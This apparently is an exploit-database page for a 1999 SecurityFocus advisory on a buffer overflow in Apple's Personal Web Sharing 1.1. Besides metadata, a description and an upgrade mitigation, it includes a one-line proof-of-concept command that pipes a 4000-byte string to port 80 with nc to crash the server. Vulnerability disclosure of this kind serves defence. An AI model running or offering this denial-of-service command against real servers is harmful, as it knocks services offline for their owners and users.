header-logo
Suggest Exploit
vendor:
Personal Web Sharing
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Personal Web Sharing
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: N/A
CPE: o:apple:personal_web_sharing
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
1999

Buffer Overflow in Apple’s Personal Web Sharing 1.1

A buffer overflow vulnerability exists in Apple's Personal Web Sharing 1.1. If an attacker sends a string of over 3000 bytes followed by two return characters to the web server's TCP port 80, the web server will stop servicing requests.

Mitigation:

Upgrade to the latest version of Apple's Personal Web Sharing.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/84/info

There appears to be a buffer overflow in Apple's Personal Web Sharing 1.1. If you connect to its TCP port number 80 and send it a string over three thousand bytes long followed by two return characters Personal Web Sharing
will stop servicing request.

$ echo `perl -e 'print "A"x4000 . "\n\n"'` | nc target.host.com 80

Navigation

Suggest Exploit

Services By CQR